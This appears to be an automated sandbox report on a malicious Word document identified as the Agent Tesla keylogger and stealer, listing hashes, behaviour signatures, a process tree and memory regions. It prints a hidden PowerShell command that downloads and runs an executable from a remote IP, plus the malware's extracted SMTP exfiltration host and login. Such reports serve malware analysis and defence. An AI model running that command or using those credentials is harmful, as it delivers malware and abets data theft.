Overview

overview

10

Static

static

8

PL_056_06_713.doc

windows7_x64

10

PL_056_06_713.doc

windows10_x64

1

Analysis

  • max time kernel
    134s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    11-05-2021 07:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PL_056_06_713.doc

  • Size

    387KB

  • MD5

    7ea976fa35d432a5f1fbd95fedb6b491

  • SHA1

    372fbcd853b6e3143abce13481b38a398a18d1c2

  • SHA256

    5559a0af254ec91974ee7dbc6e48ded1b27e0b0bba31e8a5a7c3d935cbb3a134

  • SHA512

    99665619c7b952edf1a443c237faf6ec33652710b6717128e5e80babc7c919faaf2305d8bdc3267311fa369329f03dd66cfb7561ea4875162e6c7ca2911d4910

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    sixjan.xyz
  • Port:
    587
  • Username:
    zenom@sixjan.xyz
  • Password:
    7&JWw;63ncJ^

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • AgentTesla Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PL_056_06_713.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:944
    • C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
      1⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w Hidden Invoke-WebRequest -Uri "http://31.210.20.6/w2/Qquabsz.exe" -OutFile "C:\Users\Public\Documents\jobtogether.exe";C:\Users\Public\Documents\jobtogether.exe
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1392
        • C:\Users\Public\Documents\jobtogether.exe
          "C:\Users\Public\Documents\jobtogether.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:316
          • C:\Users\Admin\AppData\Local\Temp\jobtogether.exe
            C:\Users\Admin\AppData\Local\Temp\jobtogether.exe
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1132

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • C:\Users\Public\Documents\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • C:\Users\Public\Documents\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • \Users\Admin\AppData\Local\Temp\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • \Users\Public\Documents\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • \Users\Public\Documents\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • \Users\Public\Documents\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • memory/316-102-0x0000000002050000-0x00000000020DA000-memory.dmp
      Filesize

      552KB

      Download
    • memory/316-93-0x0000000000000000-mapping.dmp
      Download
    • memory/316-103-0x00000000007E0000-0x0000000000831000-memory.dmp
      Filesize

      324KB

      Download
    • memory/316-101-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/316-97-0x00000000001C0000-0x00000000001C1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/944-100-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/944-99-0x0000000000000000-mapping.dmp
      Download
    • memory/1088-114-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1088-61-0x0000000070831000-0x0000000070833000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1088-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1088-60-0x0000000072DB1000-0x0000000072DB4000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1132-107-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/1132-108-0x000000000043761E-mapping.dmp
      Download
    • memory/1132-113-0x00000000003C0000-0x00000000003C1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1132-111-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/1392-81-0x0000000006580000-0x0000000006581000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-71-0x0000000002620000-0x0000000002621000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-90-0x0000000006610000-0x0000000006611000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-89-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-88-0x0000000006340000-0x0000000006341000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-68-0x00000000049F0000-0x00000000049F1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-65-0x0000000000000000-mapping.dmp
      Download
    • memory/1392-69-0x00000000049B0000-0x00000000049B1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-70-0x00000000049B2000-0x00000000049B3000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-80-0x0000000006140000-0x0000000006141000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-75-0x00000000060F0000-0x00000000060F1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-66-0x0000000075DA1000-0x0000000075DA3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1392-67-0x0000000002150000-0x0000000002151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1392-72-0x00000000047D0000-0x00000000047D1000-memory.dmp
      Filesize

      4KB

      Download